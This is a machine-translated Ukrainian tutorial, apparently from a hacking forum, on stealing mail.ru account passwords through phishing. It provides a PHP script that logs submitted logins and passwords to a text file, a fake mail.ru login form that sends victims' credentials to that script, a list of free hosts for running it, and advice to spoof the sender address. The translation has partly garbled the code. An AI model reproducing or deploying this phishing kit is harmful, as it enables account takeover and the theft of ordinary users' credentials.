This page has been robot translated, sorry for typos if any. Original content here.

Злом пошти на mail.ru [СІ]

[::. INTRO. ::]

Вітання! У цій статті я буду оповідати про те, як зламати поштову скриньку на безкоштовному поштовому сервісі mail.ru.

Стаття призначена для новачків, в СІ, а також для будь-якого користувача інтернету, що має бажання отримати доступ до чужого акаунту.

Але ладно не буду про це довго писати і так зрозуміло "навіщо нужнен поштову скриньку зломщикові, самі зрозумієте.

Стаття згодиться для новачків. Гуру прохання не читати :)

[::. PREPARATION. ::]

Для початку нам знадобиться безкоштовний (краще платний) хостинг з підтримкою PHP.

* Тільки заздалегідь переконаєтеся що хостинг підтримує PHP

Можна зареєструватися на будь-якому з цих:

 nextmail.ru 
 hobby.ru 
 webrise.ru 
 lapin.ru 
 free.dl-hosting.ru 
 hostow.net 
 beplaced.ru 
 777host.ru 
 paltus.ru 
 miraclehost.ru 
 freebox.ru 
 alfaspace.net 
 k70.ru 
 hosting.promostudio.ru 
 chat.ru 
 maxhost.ru 
 nixup.com 
 e2e.ru 
 noka.ru 
 newmail.ru 
 boom.ru 
 h15.ru 
 hut.ru 
 jino-net.ru 
 pochta.ru 
 unlimhost.ru 
 onepage.ru 
 by.ru 
 sbn.bz 
 yard.ru 
 domainhosting.ru 
 orthodoxy.ru 
 webservis.ru 
 ru-web.net 
 activehost.ru 
 househost.ru 
 bestof.ru 
 addr.ru 
 hosting.dump.ru 
 pesni.ru 
 medbox.ru 
 fatal.ru 
 x5x.ru 
 hopshot.com 
 5gigs.com 
 wagoo.com 
 orgfree.com 
 awardspace.com 
 bobos.ca 
 www.host.sk 
 zportal.info 
 spaceall.de 
 3x.ro 
 sretenie.ru 
 dotgeek.org 
 sevhosting.net 
 o2g.net
 www.jino-net.ru
 www.nixup.com
 newmail.ru
 ho.com.ua
 wallSt.ru
 hut.ru
 holm.ru
 e2e.ru
 fatal.ru
 host.sk
 ut.ru
 H1.ru
 Hostmos.ru
 Webm.ru
 Rdcom.ru
 narod.ru
 front.ru
 nm.ru 
 chat.ru 
 boom.ru 
 by.ru

Зареєстрували? - йдемо далі!

Що нам потрібно?

По-перше нам потрібен сниффер (це скрипт, що дозволяє зберігати дані, що приймаються в текстовий файл).


PHP Код:
  <? php
 
  $ f = fopen ( "mail.txt", "at");
  # Файл куди зберігати flock ($ f, 2);
  fputs ($ f, $ _GET [ 'Login']. "@");
  # логін fputs ($ f, $ _GET [ 'Domain']);
  # домен fputs ($ f, ";". $ _GET [ 'Password']. "\ n");
  # Пароль flock ($ f, 3);
  fclose ($ f);
  ?> <Script> document.location.href = "/click?http://win.mail.ru/cgi-bin/readmsg?id=121112312"; </ script>

Розглянемо скрипт детальніше.


PHP Код:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

Це рядок визначає, то місце, куди ми будемо перенаправляти користувача після авторизації на листі-фейк.

  • Збережемо в файл mes.php і заллємо на хостинг.
  • Також створимо в Директорії з скриптом файл mail.txt, і виставимо на нього права (chmod) 777.

Мабуть з хостингом - все!

Приступимо до самого листа, яке ми будемо відправляти жертві на мило.


Код Листи:
  <Table class = readlet cellpadding = 0 cellspacing = 0 border = 0 width = "100%"> <tr>
 
  <Td id = aj_body>
 
  <Div id = let_body> <base href = "http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg">
 
  <Table cellpadding = 0 cellspacing = 0 border = 0 class = login>
 
  <Tr>
 
  <Td> Користувач відправив вам приховане лист. <Br> Для перегляду листи введіть ваш логін і пароль. <Br> </ a> </ p> </ td>
 
  </ Tr>
 
  </ Table> <font color = 00;
  33;
  66 FACE = "Arial">
 
  <H4> Авторизація </ h4>
 
  </ Font>
 
  <Table cellpadding = 0 cellspacing = 0 border = 0 class = login>
 
  <Form method = "GET" action = "http: //адресссайта/mes.php">
 
  <Input type = "hidden" name = "mail" value = "1">
 
  <Tr>
 
  <Td width = 75>
 
  <Img src = http: //img.mail.ru/0.gif height = 1> <br> Ім'я
 
  </ Td>
 
  <Td width = 150>
 
  <Input type = "text" name = "Login">
 
  </ Td>
 
  <Td width = 75>
 
  <Select name = "Domain">
 
  <Option value = "mail.ru" SELECTED> @ mail.
  ru </ option>
 
  <Option value = "inbox.ru"> @ inbox.
  ru </ option>
 
  <Option value = "list.ru"> @list.
  ru </ option>
 
  <Option value = "bk.ru"> @ bk.
  ru </ option>
 
  </ Select>
 
  </ Td>
 
  </ Tr>
 
  <Tr>
 
  <Td>
 
  пароль
 
  </ Td>
 
  <Td>
 
  <Input type = "password" name = "Password">
 
  </ Td>
 
  <Td>
 
  <A href = "http://www.mail.ru/pages/help/92.html" target = _new> Забули пароль? </ A>
 
  </ Td>
 
  </ Tr>
 
  <Tr>
 
  <Td> </ td>
 
  <Td>
 
  <Input type = checkbox name = "level" value = 1 id = "alien"> <label for = "alien"> Чужий комп'ютер </ label>
 
  </ Td>
 
  <Td> </ td>
 
  </ Tr>
 
  <Tr>
 
  <Td> </ td>
 
  <Td>
 
  <Input type = "Submit" value = "Увійти" xstyle = "margin-top: 4px">
 
  </ Td>
 
  <Td> </ td>
 
  </ Tr> </ form>
 
  </ Table> <br> <br>
 
  Щоб детальніше дізнатися про послуги - відвідайте <a href = "http://corp.mail.ru" target = "_blank"> Corp.
  Mail.
  Ru </ a> <br>
 
  Дiяльнiсть нацiональної пошти <a href = "http://www.mail.ru" target = "_blank"> @ Mail.
  ru </ a> - найкраща безкоштовна пошта.
 
  <Base href = "http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"> </ div>
 
 

Вкажіть в параметрі action тега form - адреса вашого сайту (який ви зареєстрували вище) і шлях до сніффером mes.php.

[!] Треба звернути увагу що дані повинні передовалась методом "GET"! Інакше нічого не вийде.

Тепер залишається відправити жертві лист, бажано з підміною адреси.

Копіюємо код письма в поле для введення і відправляємо в форматі html, попередньо заповнивши поля.

Якщо жертва клюне на це, значить вам пощастило :)

Дізнатися паролі ви зможете в файлі mail.txt.

[::. END. ::]

Думаю все.

А вже як підійти до злому вирішувати вам.

Дякую за увагу!

Чекаю ваших відгуків трохи нижче цього тексту.

А краще вже нічого і нікого не ламати;)

До побачення і до зустрічі :)